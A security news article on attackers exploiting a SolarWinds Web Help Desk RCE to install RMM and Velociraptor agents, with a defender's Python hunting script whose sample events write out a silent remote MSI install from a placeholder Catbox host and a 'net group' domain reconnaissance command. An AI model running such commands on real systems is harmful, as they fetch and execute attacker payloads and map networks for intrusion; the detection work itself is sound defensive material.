SolarWinds Web Help Desk Under Attack
A critical remote code execution (RCE) vulnerability in SolarWinds Web Help Desk is being actively exploited by malicious actors. The attacks deploy legitimate administrative tools that are then misused by the attackers, which significantly increases the risk to organizations running the affected software.
Huntress reports observing 84 endpoints across 78 organizations that are vulnerable, which highlights the widespread risk associated with the SolarWinds Web Help Desk platform.
Attack Methods and Tools Used
The attack sequence begins with exploitation of the SolarWinds Web Help Desk service, where a compromised service wrapper starts a Java process. That process runs a series of commands to silently install a remote MSI payload hosted on the Catbox file-hosting service.
The payload launches a Zoho ManageEngine RMM agent, a tool that, despite its legitimate purpose, gives attackers persistent, unattended access. The agent connects to an attacker-controlled account, handing the attacker immediate control of the host.
Timeline and Techniques of the Cyber Attack
Once the remote management tool is active, the attackers perform reconnaissance to map domain-joined systems, using commands such as 'net group "domain computers" /do', a precursor to targeted lateral movement within the network.
In rapid succession, the attackers deploy Velociraptor, an open-source Digital Forensics and Incident Response (DFIR) platform, via another silent MSI installation. Although intended for defense, Velociraptor is abused to execute commands and maintain control over compromised endpoints.
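As an added illustration of how a defender could hunt for the chain described above (this is example code written for this page, not part of the original article and not Huntress's or SolarWinds' tooling), the following Python script correlates process-creation records against the stages of the intrusion: the Web Help Desk Java process spawning a shell or installer, a silent msiexec install from a remote URL, a Catbox host in that URL, activity under the RMM agent, the 'net group "domain computers" /do' reconnaissance command, and a silent Velociraptor MSI install. The Web Help Desk and ManageEngine install paths, the velociraptor.msi file name and the placeholder download URL are assumptions, and the sample events are constructed, not real telemetry.

```python
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record (Sysmon Event ID 1 style fields); constructed for this example."""
    host: str
    parent_image: str
    image: str
    cmdline: str


MSIEXEC = re.compile(r"\bmsiexec(\.exe)?\b", re.I)
SILENT_FLAG = re.compile(r"(^|\s)/(quiet|qn|qb|passive)\b", re.I)
REMOTE_URL = re.compile(r"https?://([^/\s]+)", re.I)
# 'net group "domain computers" /do' as quoted in the article; /do is the short form of
# /domain, and the quotes may be straight or curly depending on the log source.
DOMAIN_RECON = re.compile(r"\bnet1?(\.exe)?\s+group\s+[\"']?domain computers[\"']?\s+/do", re.I)
SHELLS_AND_INSTALLERS = ("cmd.exe", "powershell.exe", "pwsh.exe", "msiexec.exe")


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(e: ProcEvent) -> set:
    """Return the set of intrusion stages a single event matches (possibly several)."""
    stages = set()
    # Normalise curly quotes so the recon rule matches however the command was logged.
    cl = (e.cmdline.replace("\u201c", '"').replace("\u201d", '"')
          .replace("\u2018", "'").replace("\u2019", "'"))
    parent = e.parent_image.lower()
    image = _basename(e.image)
    # Stage 1 (assumed install path): the Web Help Desk service's Java process spawning
    # a shell or installer, which the service has no normal reason to do.
    if "webhelpdesk" in parent and _basename(e.parent_image) == "java.exe" and image in SHELLS_AND_INSTALLERS:
        stages.add("whd_java_child")
    # Stage 2: silent MSI install, flagged separately when the package comes from a URL
    # and when that URL points at a Catbox host.
    if MSIEXEC.search(cl) and SILENT_FLAG.search(cl):
        url = REMOTE_URL.search(cl)
        if url:
            stages.add("silent_msi_remote")
            if "catbox" in url.group(1).lower():
                stages.add("catbox_download")
        if "velociraptor" in cl.lower():  # assumed package name for the DFIR agent install
            stages.add("velociraptor_install")
    # Stage 3 (assumed path): anything launched by the ManageEngine RMM agent.
    if "manageengine" in parent:
        stages.add("rmm_agent_activity")
    # Stage 4: domain-computer enumeration preceding lateral movement.
    if DOMAIN_RECON.search(cl):
        stages.add("domain_recon")
    return stages


def analyze(events) -> dict:
    """Aggregate matched stages per host; hosts with no matches map to an empty list."""
    by_host = defaultdict(set)
    for e in events:
        by_host[e.host].update(classify(e))
    return {host: sorted(stages) for host, stages in by_host.items()}


def assess(stages) -> str:
    """Rate a host: the WHD Java child plus any follow-on install/agent activity is critical."""
    s = set(stages)
    if "whd_java_child" in s and s & {"silent_msi_remote", "rmm_agent_activity", "velociraptor_install"}:
        return "critical"
    if len(s) >= 2:
        return "suspicious"
    return "info" if s else "none"


SAMPLE_EVENTS = [  # constructed records; paths, host names and URL are placeholders
    ProcEvent("srv-whd-01", r"C:\Program Files\WebHelpDesk\bin\jre\bin\java.exe",
              r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c msiexec /i https://files.catbox.example/payload.msi /quiet"),
    ProcEvent("srv-whd-01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\msiexec.exe",
              "msiexec /i https://files.catbox.example/payload.msi /quiet"),
    ProcEvent("srv-whd-01", r"C:\Program Files (x86)\ManageEngine\agent\agent.exe",
              r"C:\Windows\System32\net.exe", 'net group "domain computers" /do'),
    ProcEvent("srv-whd-01", r"C:\Program Files (x86)\ManageEngine\agent\agent.exe",
              r"C:\Windows\System32\msiexec.exe", r"msiexec /i C:\Windows\Temp\velociraptor.msi /qn"),
    # Benign activity on a workstation: interactive (non-silent) install and a plain 'net user'.
    ProcEvent("ws-42", r"C:\Windows\explorer.exe", r"C:\Windows\System32\msiexec.exe",
              r"msiexec /i C:\Users\alice\Downloads\7z.msi"),
    ProcEvent("ws-42", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\net.exe", "net user"),
]


def main():
    for host, stages in analyze(SAMPLE_EVENTS).items():
        print(f"{host}: {assess(stages)} {stages}")


if __name__ == "__main__":
    main()
```

The rules are deliberately loose (substring matches on parent paths, any silent flag) because the goal is triage rather than a tuned signature: a host that shows the Web Help Desk Java process spawning an installer together with any of the later stages is rated critical and should go to incident response first, while a lone silent MSI install only raises an informational flag.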
Security Measures and Recommendations
The campaign highlights the urgency for organizations to update their SolarWinds Web Help Desk installations to version 2026.1 or later, which addresses CVE-2025-26399, CVE-2025-40536, and CVE-2025-40551.
Security measures should also include removing administrative interfaces from internet exposure, rotating credentials, and thoroughly reviewing systems for unauthorized tools and activity. Proactive measures are vital as exploitation efforts continue to escalate.